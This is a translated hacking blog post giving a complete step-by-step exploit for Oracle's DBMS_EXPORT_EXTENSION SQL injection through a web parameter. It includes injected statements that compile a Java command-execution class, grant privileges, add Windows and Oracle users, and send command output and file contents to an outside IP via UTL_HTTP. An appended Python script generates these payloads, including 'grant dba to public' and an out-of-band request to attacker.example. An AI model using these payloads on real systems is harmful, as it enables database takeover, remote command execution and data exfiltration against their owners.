A worked demonstration of the full process of getting a cmdshell through Oracle injection

Posted on 2012-12-18 12:21:48
All of the demonstrations below were run from a web-based SQL*Plus. For web injection, turn the select SYS.DBMS_EXPORT_EXTENSION..... statement into the form
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
(the 'a'|| is there so that the condition evaluates to true). Every statement below uses the same wrapper: the TYPE_NAME argument starts with DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE and ends with ;END;--, and only the innermost statement changes from step to step. Each quoting level doubles the single quotes, so a quote inside the innermost statement is written as eight quotes ('''''''').
The statements are fairly long, so a POST submission is probably needed.
The individual steps are as follows:
1. Create the Java class
By injecting through the SYS.DBMS_EXPORT_EXTENSION function, create a Java class LinxUtil in Oracle with two methods: runCMD executes a system command and readFile reads a file (runCMD only captures the command's standard output; anything written to standard error is not returned):
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
If the URL has a length limit, the readFile() block can be left out, i.e.:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
In that case also drop the statements that deal with readFile() in the later steps.
------------------------------
2. Grant the Java permission
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
Note that the execute action of java.io.FilePermission only covers Runtime.exec(). If readFile() later fails with a java.security.AccessControlException, grant the read action in the same way.
3. Create the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. Grant PUBLIC the right to execute the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. Check that the steps above succeeded
and '1'<>'11'||(
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
)
and '1'<>(
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
)
6. Execute commands:
/xxx.jsp?id=1 and '1'<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)
Note that sys.LinxReadFile() returns varchar, so "and 1<>" cannot be used in place of "and '1'<>".
To see the output, use a union (the column count and types must match those of the original query):
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
or UTL_HTTP.request:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)
Note: with UTL_HTTP.request, use REPLACE() to replace spaces and newlines, otherwise the HTTP request cannot be sent. The newline has to be written as chr(10): in Oracle SQL the literal '\n' is just a backslash followed by an n and matches nothing. utl_encode.base64_encode also works (it takes and returns RAW, so convert with utl_raw.cast_to_raw and utl_raw.cast_to_varchar2).
--------------------
7. Internal changes
The changes to all_objects can be seen with the following query:
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
(Both patterns are needed: the Java source was created with a quoted name, so it keeps the mixed-case name LinxUtil, while the unquoted function names are stored in upper case.)
8. Drop the function we created
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
LinxReadFile and the Java source LinxUtil are removed in the same way.
====================================================
End of text. Dedicated to my friend.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
That is, the same query with every string argument written as a chr() expression, so that no quote characters appear in the request (note the quotes inside the encoded string are doubled once less than in the literal form, because they are no longer inside an outer SQL literal):
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
Confirm that the vulnerability exists:
1<>(
select user_id from all_users where username='LINXSQL'
)
Give linxsql the connect privilege:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
Drop the account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
The following creates a function Linx_query() that can execute arbitrary statements; on success it returns the number 1. Because it is declared authid current_user, however, it runs with the caller's privileges, which may be no more than PUBLIC's, so it is of limited use. If it is really needed, consider granting dba to the current user first:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
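The following is an added example and is not code from the original post. It is a small Python helper that reproduces the quoting the statements above depend on (the innermost statement's quotes are doubled once per EXECUTE IMMEDIATE level and once more for the outer SQL literal, which is why a quote in step 2 appears as eight quotes), emits the chr()-encoded variant used in the CREATE USER example, decodes such an expression back to text, and builds the UTL_HTTP.request form with the newline replacement done on chr(10). The function names, the /xxx.jsp?id=1 base path and the attacker.example host are this example's own assumptions; nothing here connects to a database.

```python
"""Payload builder for the DBMS_EXPORT_EXTENSION technique shown in this post.

Added example, not code from the original post. It reproduces the nested
quoting of the page's statements, emits the chr()-encoded variant, decodes
chr() expressions, and builds the UTL_HTTP.request out-of-band form. It only
builds strings; nothing here connects to a database.
"""
import re

# Fixed wrapper around the injected TYPE_NAME argument. Only the innermost
# statement (stmt) changes between the steps of the post.
PREFIX = 'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE \''
SUFFIX = "';END;--"
INNER_HEAD = "DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '"
INNER_TAIL = "';END;"


def sql_escape(s):
    """Escape s for use inside a single-quoted SQL literal (every ' becomes '')."""
    return s.replace("'", "''")


def type_name_value(stmt):
    """The TYPE_NAME string as Oracle sees it after parsing the outer query.

    stmt is one DDL/DCL statement run by EXECUTE IMMEDIATE as SYS inside an
    autonomous transaction. Its quotes pass through two EXECUTE IMMEDIATE
    literals, so they are doubled twice here.
    """
    inner = INNER_HEAD + sql_escape(stmt) + INNER_TAIL
    return PREFIX + sql_escape(inner) + SUFFIX


def build_query(stmt):
    """Literal form of the query. A third doubling happens for the outer SQL
    literal, which is why a quote inside stmt appears as '''''''' (8 quotes)."""
    return ("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','"
            + sql_escape(type_name_value(stmt)) + "','SYS',0,'1',0) from dual")


def to_chr(s):
    """Encode an ASCII string as chr(n)||chr(n)||..., so the request carries no quotes."""
    if not s.isascii():
        raise ValueError("chr() of non-ASCII depends on the database character set")
    return "||".join("chr(%d)" % ord(c) for c in s)


def build_chr_query(stmt):
    """Same query with every string argument as a chr() expression (the post's CREATE USER form)."""
    args = [to_chr("FOO"), to_chr("BAR"), to_chr(type_name_value(stmt)),
            to_chr("SYS"), "0", to_chr("1"), "0"]
    return ("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES("
            + ",".join(args) + ") from dual")


CHR_RE = re.compile(r"chr\((\d+)\)")


def decode_chr(expr):
    """Reverse of to_chr: recover the text from a chr()||chr() expression (e.g. from a WAF or access log)."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(expr))


def oob_request(url_prefix, expr):
    """UTL_HTTP.request form: the newline is chr(10), not the two characters backslash-n."""
    return ("SELECT UTL_HTTP.request('" + sql_escape(url_prefix)
            + "'||REPLACE(REPLACE(" + expr + ",' ','%20'),chr(10),'%0A')) FROM dual")


def as_web_condition(query, base="/xxx.jsp?id=1"):
    """Wrap a query the way the post does: and '1'<>'a'||( ... )."""
    return base + " and '1'<>'a'||(" + query + ")"


if __name__ == "__main__":
    # attacker.example is a placeholder host for this example.
    print(as_web_condition(build_query("grant dba to public")))
    print(as_web_condition(build_chr_query("CREATE USER linxsql IDENTIFIED BY linxsql")))
    print(as_web_condition(oob_request("http://attacker.example/record.php?a=",
                                       "sys.LinxRunCMD('cmd /c whoami')")))
```

build_query("grant dba to public") yields exactly the well-known one-line form of this payload, and build_chr_query("CREATE USER linxsql IDENTIFIED BY linxsql") reproduces the chr() sequence shown in the post, which is a quick way to check a hand-written payload before sending it; decode_chr is the defender's counterpart for reading such requests out of a web server log.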